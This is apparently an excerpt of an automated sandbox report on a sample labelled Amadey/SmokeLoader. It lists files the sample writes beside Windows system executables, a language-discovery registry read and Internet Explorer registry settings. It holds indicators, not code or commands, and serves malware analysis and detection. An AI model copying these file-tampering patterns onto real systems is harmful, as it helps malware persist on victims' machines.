| File created | C:\Windows\WinSxS\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.19041.1202_none_497a4c9b969ee5eb\wsmprovhost.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\x86_microsoft-windows-ie-ielowutil_31bf3856ad364e35_11.0.19041.1_none_9439f8fec314ad47\ielowutil.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-gpowershell-exe_31bf3856ad364e35_10.0.19041.1_none_ee822d264112a470\powershell_ise.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-mapi_31bf3856ad364e35_10.0.19041.423_none_895925637881788e\f\fixmapi.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-d..x-directxdiagnostic_31bf3856ad364e35_10.0.19041.1_none_e409500831824146\dxdiag.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.19041.1202_none_3fe90cdb6667211e\r\wevtutil.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..onentpackagesupport_31bf3856ad364e35_10.0.19041.1_none_15ad78a57833209d\CompPkgSrv.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..ime-eashared-imepad_31bf3856ad364e35_10.0.19041.1_none_f07d4fae3e8e883f\IMEPADSV.EXE- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-bits-bitsadmin_31bf3856ad364e35_10.0.19041.1_none_0d5748d7e02a5474\bitsadmin.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-dataexchangehost_31bf3856ad364e35_10.0.19041.264_none_c765d8a6c76ec25f\f\DataExchangeHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-rasautodial_31bf3856ad364e35_10.0.19041.546_none_edd345b6c42269da\r\rasautou.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.19041.1266_none_93a0f3defb54e912\f\rdpshell.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.19041.1151_none_2e15548db03a22c8\r\CheckNetIsolation.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ComSvcConfig.exe | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_hyperv-compute-containerdiagnosticstool_31bf3856ad364e35_10.0.19041.928_none_6571ff6e96271a64\r\hcsdiag.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_10.0.19041.1266_none_cfec8db821d83671\f\winresume.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..utermanagerlauncher_31bf3856ad364e35_10.0.19041.1_none_4406801793afabed\CompMgmtLauncher.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-i..switch-toasthandler_31bf3856ad364e35_10.0.19041.1_none_8089599dd595a93d\InputSwitchToastHandler.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_49716c2392052aca\relog.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.19041.1081_none_f28ba6a10743aebc\r\SpeechModelDownload.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.19041.264_none_5b8f61a9b1063622\SpeechModelDownload.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-coresystem-wpr_31bf3856ad364e35_10.0.19041.207_none_4054ef70f69f6ff9\r\wpr.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-coredpussvr_31bf3856ad364e35_10.0.19041.1_none_513ebdc8ffa81e3d\coredpussvr.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-netplwiz-exe_31bf3856ad364e35_10.0.19041.1_none_a347c249afbf6f97\Netplwiz.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\r\printui.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-d..omerfeedbackmanager_31bf3856ad364e35_10.0.19041.844_none_c47fb20821633815\f\imecfmui.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-terminalservices-theme_31bf3856ad364e35_10.0.19041.1_none_962bc7b24e8d9f3a\TSTheme.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.153_none_90dc0b923cd83016\SecHealthUI.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-t..ices-appcompattools_31bf3856ad364e35_10.0.19041.1_none_a9109d150b1bf064\acregl.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.19041.1_none_330dfb2b06b21af6\chcp.com- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-r..ckgroundmediaplayer_31bf3856ad364e35_10.0.19041.1_none_71d70fbd497cca66\Windows.Media.BackgroundPlayback.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..biometrics-trustlet_31bf3856ad364e35_10.0.19041.1_none_fb337fa99fb8bc2f\BioIso.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..nsemanager-shellext_31bf3856ad364e35_10.0.19041.1_none_683b3c51d469e51b\LicenseManagerShellext.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6B8E5EE0-58CF-11F0-A7F8-7AE4B03588A9} = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1082430718" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31190236" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Bing" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a600000000020000000000106600000001000020000000082d8246d93faf674330a8d690fdf8307d26addbdf376794c00bcf76dbe4e304000000000e800000000200002000000072eebb86b760246618b09a8dbbf3807f487d2c9867219aee130a797fbcb52b67100000006f8b16e9c04532efd7721976f8f2e01040000000b8559d26d53255a4a71e7b2fce8e9abbcc1fcfa91eb5790118851b8af55ac239c5b8222b2e829f1ad9aab3ad7e8cfcbb658ca0fb7cea5247ebc3964b076582d5 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31190236" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a6000000000200000000001066000000010000200000001d4189afb7466bcd7b49fdc11f4416befc413194cf7b088074deddcfe3db5e19000000000e8000000002000020000000083e5fece4cf13bc27815e8e062d094d205619c240dd5f8fe9417966a79bec881000000041b529b3443a09878b41a37f18b13064400000001015a2745def0e4681fae76b08358cfa4d58db21f44e29807354d2002b124b377323626131fdc083272f9b30d196a877250f03cb5d8f541f01bdcfea3fe99be4 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a600000000020000000000106600000001000020000000d68a466fbbefa9c3c6d2723742e1871801336ac8df602f5e1b37a4d9d55c9a1e000000000e80000000020000200000003bbbd99ce226e6ddb1ca1c73569fcd3bb97b6d4bcb8d1d843d3eb2451d2edfa020000000a02ad7f778df8abbee9ebea45601a8a86d10b472c734b2e56f1a0a1cb188523d400000002f8ea128be1896970398ddf94ebe0a9795888eea3bb0cde3b7ca7f804491382405d67179e9a20d972996f6685c1398a4ab238ee9e9553117d9a762a1a5866f91 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d09bee44dcecdb01 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a6000000000200000000001066000000010000200000008cb82d808929f3416b8c9d73872e8929ed185f26eabce6573b0723eb9a9f3993000000000e8000000002000020000000bc81db7b03855515ecdcb9d6e70be4d4cdec534ee740d846f51b4ac449c0c98d20000000574cb4374ac9c05940b1a6c92e2bff5d4a9258f03ecfae2fdab0c6cac784f12e40000000d565a077d4cdd3733fe13443a488c12bd28a5648646f7765c6ed43aea3af81c669e820483a67e9c6b62df6a8ad4638cb7c5ae2c5c5b188ed90f6059fb5b9abb7 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\KnownProvidersUpgradeTime = 77f9f6305be1db01 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a600000000020000000000106600000001000020000000ede43b9c75f3d5088106e96ca4968ada0c806622942dfa14b1cba3d7e83b09ef000000000e80000000020000200000001d03740c00146c3a20139cdb2e70bf323f7a353e8841b7d99062ecfff0422c7e50000000a4f01d159f36f1ebca5b04e6712283361c11a210b8c90ffc4c7b3af6dd9a0f4755b0ce2f2258ff3c69ed0daf8f30e8f4c5c5dc4a8856d3aebd5c2f888674099afee8b25236caa1a5a6493a1736abb22740000000c655e52d9563ab0099583d9d1f1462791db8866c19b1198ac13db84db56fded837524473376515afc139aadfa8824f46906bd28a743665925d7cc4c87152f99c | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1074461819" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000120c8ad82f5bf4408e10b6f8c826b1a6000000000200000000001066000000010000200000006f08b1e66cbd0b102cad99da0debe87f0332e6e6db66f0eb8ab1d9c805e82034000000000e800000000200002000000097d2d38659143be6fca04c012de1ee26416ce20dab01a22807a3a188c2a0dbf35000000088c875320e6b5d6d38c10515026515b0d61f473f08906d0469ea2341be9e6624b357909727d8ef604c27db16ba85327ecf42a18730827620aeb2529ffedbf7afd9d6df7d088b37e1b3a39112ded666824000000042e01dcba2466d83dc936cdd61ca96a770b2027eabbc2c8444bc44fb50590c4e4d28cb9fdea448c6867e52f6a608fd57d095150e827feba89ad37acd4ebf7aed | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458395808" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\User Preferences | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\Version = "5" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 77f9f6305be1db01 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IENTSS" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
